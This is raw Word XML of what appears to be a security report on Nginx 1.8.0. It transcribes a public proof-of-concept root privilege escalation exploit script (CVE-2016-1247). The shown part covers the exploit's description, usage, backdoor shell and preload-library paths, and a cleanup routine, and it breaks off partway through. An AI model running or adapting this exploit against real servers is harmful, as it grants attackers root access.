    <w:p w14:paraId="2F4097F0" w14:textId="77777777" w:rsidR="006118D8" w:rsidRPr="002B24A4" w:rsidRDefault="00065DDE" w:rsidP="006118D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3121246A" wp14:editId="5F7EB2D3">
            <wp:extent cx="3048000" cy="1438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9209" cy="1462439"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C11ACA0" w14:textId="77777777" w:rsidR="00C06271" w:rsidRPr="002B24A4" w:rsidRDefault="00C06271" w:rsidP="006118D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D18592F" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-180" w:right="810" w:firstLine="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A22187F" w14:textId="77777777" w:rsidR="0057440B" w:rsidRPr="002B24A4" w:rsidRDefault="0057440B" w:rsidP="00673F7F">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-180" w:right="810" w:firstLine="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2912915C" w14:textId="77777777" w:rsidR="00C06271" w:rsidRPr="002B24A4" w:rsidRDefault="00C06271" w:rsidP="00673F7F">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-180" w:right="810" w:firstLine="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VULNERABILITIES BY RAPID7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485F4C5D" w14:textId="77777777" w:rsidR="00C06271" w:rsidRPr="002B24A4" w:rsidRDefault="00C06271" w:rsidP="00673F7F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="630" w:right="810" w:hanging="630"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A9F2AF6" wp14:editId="673FDED4">
            <wp:extent cx="2023836" cy="923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1015" cy="940898"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0172BD" w14:textId="77777777" w:rsidR="0092704C" w:rsidRDefault="0092704C" w:rsidP="006118D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="519B862A" w14:textId="77777777" w:rsidR="00C06271" w:rsidRPr="002B24A4" w:rsidRDefault="00C06271" w:rsidP="006118D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18546574" wp14:editId="78C4BEF8">
            <wp:extent cx="6800850" cy="4352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00850" cy="4352925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5676DA5D" w14:textId="77777777" w:rsidR="006118D8" w:rsidRPr="002B24A4" w:rsidRDefault="00C06271" w:rsidP="006118D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EDF3A43" wp14:editId="44CAF415">
            <wp:extent cx="6800850" cy="1228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00850" cy="1228725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A40B36" w14:textId="77777777" w:rsidR="002350DA" w:rsidRPr="002B24A4" w:rsidRDefault="002350DA" w:rsidP="006118D8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384EDFE6" w14:textId="77777777" w:rsidR="000C69E2" w:rsidRPr="002B24A4" w:rsidRDefault="000C69E2" w:rsidP="006118D8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F046C2" w14:textId="77777777" w:rsidR="000C69E2" w:rsidRPr="002B24A4" w:rsidRDefault="000C69E2" w:rsidP="006118D8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D74FE6" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="006118D8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F211912" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="006118D8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CBC4AB" w14:textId="77777777" w:rsidR="0057440B" w:rsidRDefault="0057440B" w:rsidP="006118D8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B44BB26" w14:textId="77777777" w:rsidR="002B24A4" w:rsidRDefault="002B24A4" w:rsidP="006118D8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36CC7147" w14:textId="77777777" w:rsidR="002B24A4" w:rsidRDefault="002B24A4" w:rsidP="006118D8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C228DC7" w14:textId="77777777" w:rsidR="002B24A4" w:rsidRDefault="002B24A4" w:rsidP="006118D8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A5F518" w14:textId="77777777" w:rsidR="002B24A4" w:rsidRDefault="002B24A4" w:rsidP="006118D8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB85F7A" w14:textId="77777777" w:rsidR="002B24A4" w:rsidRDefault="002B24A4" w:rsidP="006118D8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0533A949" w14:textId="77777777" w:rsidR="002B24A4" w:rsidRPr="002B24A4" w:rsidRDefault="002B24A4" w:rsidP="006118D8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F20075" w14:textId="77777777" w:rsidR="002350DA" w:rsidRPr="002B24A4" w:rsidRDefault="002350DA" w:rsidP="006118D8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-630" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPLOITS IN NGINX 1.8.0 </w:t>
      </w:r>
      <w:r w:rsidR="000D228D" w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BY LEGAL HACKERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44083F0D"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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39029801" wp14:editId="338E380E">
            <wp:extent cx="4705350" cy="1028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350" cy="1028700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B67B88E"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PROOF OF CONCEPT EXPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251FE978"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544C57D1" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD1C1BF"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nginxed-root.sh ]--------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D028789" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65169A17"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bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F223FFE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFDD2BB"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Nginx (Debian-based distros + Gentoo) - Root Privilege Escalation PoC Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578A3982"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nginxed-root.sh (ver. 1.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCD0771"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A36461"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CVE-2016-1247</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674E871F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA29EB5"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Discovered and coded by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAF558D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7071ED38"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lastRenderedPageBreak/>
        <w:t># Dawid Golunski</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA665DE"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dawid[at]legalhackers.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539EDE79"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C9A638"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xml:space="preserve"># </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://legalhackers.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22FA7927"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E069997"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xml:space="preserve"># Follow </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://twitter.com/dawid_golunski</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for updates on this advisory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3F408C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9C1D17"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F14DA36"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This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E04482D"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xml:space="preserve"># as well as Gentoo etc.) to escalate their privileges from nginx web server user </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555191E1"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www-data) to root through unsafe error log handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35565309"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC4222"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The exploit waits for Nginx server to be restarted or receive a USR1 signal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1041DF3B"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On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1D9BD9"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script which is called daily by the cron.daily on default installations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF09D42"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The restart should take place at 6:25am which is when cron.daily executes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CDED7A"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Attackers can therefore get a root shell automatically in 24h at most without any admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281C4EF1"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xml:space="preserve"># interaction just by letting the exploit run till 6:25am assuming that daily logrotation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610D436C"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xml:space="preserve"># has been configured. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E07833"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427020EE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AC3395"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Exploit usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0343D544"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xml:space="preserve"># ./nginxed-root.sh path_to_nginx_error.log </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C594806"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D0278"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To trigger logrotation for testing the exploit, you can run the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C4A2D7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA7E581"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usr/sbin/logrotate -vf /etc/logrotate.d/nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371C3FB5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C4E549"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See the full advisory for details at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099CF5E4"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xml:space="preserve"># </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6591F388"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B38A217"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Video PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AF2599"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xml:space="preserve"># </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78421EDE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA72502"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76438907"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Disclaimer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ECC071"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For testing purposes only. Do no harm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709F5BEE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C96B219" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C3B2DA5"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BACKDOORSH="/bin/bash"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7552CE22"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BACKDOORPATH="/tmp/nginxrootsh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BADB3A"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lastRenderedPageBreak/>
        <w:t>PRIVESCLIB="/tmp/privesclib.so"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F78F0B4"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PRIVESCSRC="/tmp/privesclib.c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB6D872"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SUIDBIN="/usr/bin/sudo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9A69F3" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70DF75A0"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function cleanexit {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B07FF9"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ab/>
        <w:t xml:space="preserve"># Cleanup </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592A4F3E"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ab/>
        <w:t>echo -e "\n[+] Cleaning up..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472EEAEB"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ab/>
        <w:t>rm -f $PRIVESCSRC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF71AB3"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ab/>
        <w:t>rm -f $PRIVESCLIB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC8435B"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ab/>
        <w:t>rm -f $ERRORLOG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCCDD7E"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ab/>
        <w:t>touch $ERRORLOG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A59DFAD"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ab/>
        <w:t>if [ -f /etc/ld.so.preload ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E6AC77"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ab/>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>echo -n &gt; /etc/ld.so.preload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3073290C"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ab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFA86B4"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ab/>
        <w:t>echo -e "\n[+] Job done. Exiting with code $1 \n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420E7CF5"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ab/>
        <w:t>exit $1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DCAD7A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF7FF6E" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
